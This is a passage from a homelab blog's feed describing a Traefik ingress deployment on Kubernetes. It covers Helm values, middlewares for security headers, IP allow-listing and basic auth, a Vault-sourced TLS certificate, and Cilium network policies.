health port. This is there just because it&rsquo;s the same for my Nomad Traefik.
The <code>homelab/ingress</code> label is there to be used in <code>NetworkPolicy</code> manifests
to allow access for Traefik to services proxied through it.</p>
<p>The <code>ingressendpoint</code> option is an option which ensures that <code>external-dns</code>
later just creates a <code>CNAME</code> entry for each Ingress resource pointing to the
given DNS entry, which will point to the Traefik <code>LoadBalancer</code> Service IP.</p>
<p>I&rsquo;m disabling metrics here because I have not yet set up Prometheus. The
resources assignments are simply coming from the metrics I&rsquo;ve gathered from my
Nomad Traefik deployment over the years.</p>
<p>Next, let&rsquo;s define Traefik&rsquo;s ports. I&rsquo;m staying with the ports for HTTP and HTTPS
here. There are a couple more, like the health port, but I&rsquo;m leaving them out
for the sake of brevity (yes, you are allowed to chuckle dryly now &#x1f609;).</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">traefik</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">websecure</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metrics</span>: <span style="color:#66d9ef">null</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secureweb</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">8000</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">exposedPort</span>: <span style="color:#ae81ff">443</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">expose</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tls</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">middlewares</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">traefik-ingress-compression@kubernetescrd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">traefik-ingress-headers-security@kubernetescrd</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">traefik-ingress-local-net@kubernetescrd</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">web</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">8081</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">exposedPort</span>: <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">expose</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">redirectTo</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">secureweb</span>
</span></span></code></pre></div><p>The <code>traefik</code>, <code>websecure</code> and <code>metrics</code> ports are enabled in the default
<code>values.yaml</code> file of the chart, but I&rsquo;m using my own nomenclature. I will also
show the manifests for the middlewares later.</p>
<p>The port options impact two manifests generated by the chart. First, the
<a href="https://github.com/traefik/traefik-helm-chart/blob/master/traefik/templates/_podtemplate.tpl">pod template</a>,
which defines the entrypoints for all of them via CLI arguments for the Traefik
pod:</p>
<pre tabindex="0"><code>[...]
--entrypoints.secureweb.address=:8000/tcp
--entrypoints.web.address=:8081/tcp
--entrypoints.secureweb.http.middlewares=traefik-ingress-compression@kubernetescrd,traefik-ingress-headers-security@kubernetescrd,traefik-ingress-local-net@kubernetescrd
--entrypoints.secureweb.http.tls=true
--entrypoints.web.http.redirections.entryPoint.to=:443
--entrypoints.web.http.redirections.entryPoint.scheme=https
[...]
</code></pre><p>Those ports are also used in the definition of the Service:</p>
<pre tabindex="0"><code>Port:                     secureweb  443/TCP
TargetPort:               secureweb/TCP
NodePort:                 secureweb  31512/TCP
Endpoints:                10.8.4.116:8000
Port:                     web  80/TCP
TargetPort:               web/TCP
NodePort:                 web  30208/TCP
Endpoints:                10.8.4.116:8081
</code></pre><p>Traefik also provides a nice read-only dashboard to see all the configured
routes, services and so forth. It is supplied with an Ingress via the chart:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">ingressRoute</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dashboard</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">admin</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">middlewares</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">admin-basic-auth</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">healthcheck</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">health</span>
</span></span></code></pre></div><p>As you can see, this is not a default Kubernetes Ingress, but instead Traefik&rsquo;s
own Ingress definition, the <a href="https://doc.traefik.io/traefik/routing/providers/kubernetes-crd/">IngressRoute</a>.
Normal Kubernetes Ingress manifests <a href="https://doc.traefik.io/traefik/routing/providers/kubernetes-ingress/">also work fine</a>,
but they need to then supply Traefik options via annotations.</p>
<p>Next comes the Service definition:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">single</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">ingress-k8s.mei-home.net</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">io.cilium/lb-ipam-ips</span>: <span style="color:#e6db74">&#34;10.86.55.22&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span></code></pre></div><p>With the <code>single</code> option, you can configure whether Traefik creates a single
Service for both TCP and UDP or a separate Service for each.
The <code>external-dns.alpha.kubernetes.io/hostname</code> annotation sets the DNS name
automatically configured by external-dns. I&rsquo;m also setting a fixed IP instead
of letting Cilium assign one from the pool, so I can properly configure firewall
rules.
The <code>homelab/public-service</code> label is significant, because it denotes the services
which Cilium announces. See <a href="https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/">my post</a>
on using the Cilium BGP load balancer.
As noted above, <code>externalTrafficPolicy: Local</code> gives me source IP preservation.</p>
<p>The last base configuration options are for TLS, but I will go into more details
about how I manage the TLS cert later on.</p>
<h1 id="middlewares">Middlewares</h1>
<p>In Traefik, Middlewares are part of the request handling pipeline. A request
enters Traefik via any of the <a href="https://doc.traefik.io/traefik/routing/entrypoints/">EntryPoints</a>.
Then, all Middlewares are applied. These range from IP allow listing to URL
rewriting. They can be assigned to EntryPoints, which means they are getting
applied to every request, or to specific routes via Ingress or IngressRoute
configs.</p>
<p>I&rsquo;m using a couple of them, which I supply via the Helm chart&rsquo;s <code>extraObjects</code>
value:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">extraObjects</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">compression</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">compress</span>: {}
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">headers-security</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">headers</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">stsSeconds</span>: <span style="color:#ae81ff">63072000</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">stsIncludeSubdomains</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">customFrameOptionsValue</span>: <span style="color:#e6db74">&#34;sameorigin&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">contentTypeNosniff</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">referrerPolicy</span>: <span style="color:#e6db74">&#34;same-origin&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">browserXssFilter</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">local-net</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ipWhiteList</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">sourceRange</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;10.1.1.0/24&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;192.168.1.0/24&#34;</span>
</span></span></code></pre></div><p>The first one, <code>compression</code>, just enables the <a href="https://doc.traefik.io/traefik/middlewares/http/compress/">compression</a> middleware.</p>
<p><code>headers-security</code> adds a couple of best practices headers to all requests
for security&rsquo;s sake. The last one, <code>local-net</code>, is an IP allow list for some of my Homelab
subnets.</p>
<h1 id="securing-the-dashboard">Securing the dashboard</h1>
<p>Let&rsquo;s look at the IngressRoute for the dashboard a second time, specifically
its <code>middlewares</code> option:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">middlewares</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">admin-basic-auth</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span></code></pre></div><p>This option enables the following middleware:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">admin-basic-auth</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">basicAuth</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secret</span>: <span style="color:#ae81ff">basic-auth-users</span>
</span></span></code></pre></div><p>This is a <a href="https://doc.traefik.io/traefik/middlewares/http/basicauth/">BasicAuth</a>
middleware, adding HTTP basic auth to my dashboard, just as another layer of
security.</p>
<p>This middleware expects the secret <code>basic-auth-users</code> to contain a key
<code>users</code>, where the users are listed in the following format:</p>
<pre tabindex="0"><code class="language-none" data-lang="none">username:hashedpassword
myuser:$apr1$wpjd1k59$B5E9r2e8DUgmGWubIb/Bk/
</code></pre><p>The entries can for example be created with <a href="https://httpd.apache.org/docs/2.4/misc/password_encryptions.html">htpasswd</a>.</p>
<p>In my setup, I&rsquo;m handling secrets via my <a href="https://www.vaultproject.io/">Vault instance</a>
with <a href="https://external-secrets.io/latest/">external-secrets</a>. I&rsquo;ve described
the setup <a href="https://blog.mei-home.net/posts/k8s-migration-1-external-secrets/">here</a>.
The secret definition for the basic auth secret looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;basic-auth-users&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;15m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">users</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ printf &#34;{{ `{{ .user1 }}` }}&#34; }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">user1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;secret/my_kubernetes_secrets/cluster/ingress/auth/user1&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">val</span>
</span></span></code></pre></div><p>What happens here is that external-secrets takes the JSON object returned by
Vault for the <code>secret/my_kubernetes_secrets/cluster/ingress/auth/user1</code> path,
and then takes the <code>val</code> key in that object, putting it into <code>user1</code>. That&rsquo;s
then accessed in the template for the Kubernetes Secret.</p>
<p>The weird <code>{{ printf &quot;{{ '{{ .user1 }}' }}&quot; }}</code> syntax comes from the fact
that I&rsquo;m using Helmfile for my Helm charts management, and that puts value
files through a round of Go templating. That&rsquo;s what the outer <code>printf</code> is used
to escape. Then that value file goes through Helm&rsquo;s templating. That&rsquo;s escaped
by <code>{{  }}</code> and the backticks. And then <code>{{ .user1 }}</code> is the template that&rsquo;s
used by external-secrets.</p>
<h1 id="the-tls-certificate">The TLS certificate</h1>
<p>My TLS certificate is a wildcard certificate from Let&rsquo;s Encrypt. Sadly, my
domain registrar does not support an API for the DNS entries, so for now I have
to solve the DNS challenge manually.
I&rsquo;m using the LE cert for both, internal and external services. Mostly so that
I don&rsquo;t have to muck around with distributing a self-signed CA cert to all my
end-user devices.
After I&rsquo;ve renewed the cert, I push it to Vault and use it from there.</p>
<p>The <code>ExternalSecret</code> for getting the certs into Kubernetes looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;le-cert&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;15m&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">kubernetes.io/tls</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">tls.key</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ printf &#34;{{ `{{ .privkey }}` }}&#34; }}</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">tls.crt</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          {{ printf &#34;{{ `{{ .fullchain }}` }}&#34; }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">extract</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/my_kubernetes_cluster/cluster/ingress/le-cert</span>
</span></span></code></pre></div><p>The two-level escape of the <code>{{ .privkey }}</code> and <code>{{ .fullchain }}</code> templates
is again to make sure neither Helmfile nor Helm itself try to interpret the
templates.</p>
<p>Here, I&rsquo;m using a slightly different format for fetching the secret. With
<code>dataFrom</code> instead of <code>data</code>, as in the basic auth secret, I&rsquo;m getting the entire
JSON object from that path, instead of a specific key from that object.
When I push my cert to Vault, I have four keys, with the private key, the cert
itself, the cert chain and the full chain. Here, I only need the private key
and the full chain.</p>
<p>This secret is then used in Traefik&rsquo;s <a href="https://doc.traefik.io/traefik/https/tls/#certificates-stores">TLSStore</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">tlsStore</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">default</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">defaultCertificate</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">le-cert</span>
</span></span></code></pre></div><h1 id="network-policies">Network policies</h1>
<p>Before coming to an example, I also want to show the <code>NetworkPolicy</code> I&rsquo;m using:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;traefik-allow-world-only&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">world</span>
</span></span></code></pre></div><p>With the <code>{}</code> <code>endpointSelector</code>, the policy is applied to all pods in the
namespace the policy resides in. In this particular case, that&rsquo;s only the Traefik
pod.
The <code>fromEndpoints:</code> setting in turn says that ingress should be allowed from
all pods within the same namespace. Finally the only really interesting setting
here is the <code>fromEntities: [world]</code>. This setting allows all external traffic
from nodes which are not managed by Cilium, meaning the rest of my Homelab and
especially my end-user devices.</p>
<h1 id="example-ingress">Example Ingress</h1>
<p>Last but not least, let&rsquo;s have a look at a quick example. In my
<a href="https://blog.mei-home.net/posts/k8s-migration-2-cilium-lb/#example">post about load balancers</a>,
I introduced a simple echo server and made it available via a <code>LoadBalancer</code> type
Service. With Traefik up and running, I can now switch that service to <code>ClusterIP</code>
and introduce the following <code>Ingress</code> manifest:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">networking.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Ingress</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsetup-ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">host</span>: <span style="color:#ae81ff">testsetup.mei-home.net</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">http</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">paths</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">pathType</span>: <span style="color:#ae81ff">Prefix</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">backend</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">service</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsetup-service</span>
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">port</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http-port</span>
</span></span></code></pre></div><p>The only Traefik specific config here is the <code>entrypoints</code> annotation, telling
Traefik to accept connections to the service on the <code>secureweb</code> entrypoint.</p>
<p>One nice thing about external-dns is that I don&rsquo;t have to provide an extra
annotation to create a DNS entry. It is automatically created from the
<code>host:</code> value.</p>
<p>Traefik will parse the Ingress and create a route, where requests are
routed by which domain they request.
Traefik then automatically routes those requests via the Kubernetes Service
and will automatically execute all the Middlewares for the <code>secureweb</code> entrypoint.</p>
<p>To ensure that Traefik can access the echo pod, I also needed another
network policy:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;testsetup-deny-all-ingress&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span></code></pre></div><p>Again, this policy is applied to all pods in the namespace for my <code>testsetup</code>
pod, and it allows ingress from all pods in that namespace.
But the Traefik pod lives in another namespace, and so access needs to be
explicitly granted. That&rsquo;s what the <code>matchLabels</code> key is about, where I provide
my ingress label and, importantly, also the namespace, as that&rsquo;s part of Cilium&rsquo;s
secure identity.</p>
<p>And with that, another piece of important cluster infrastructure is up. :slight_smile:</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 2a: Switching the LoadBalancer to BGP</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/</link>
      <pubDate>Tue, 02 Jan 2024 23:00:26 +0100</pubDate>
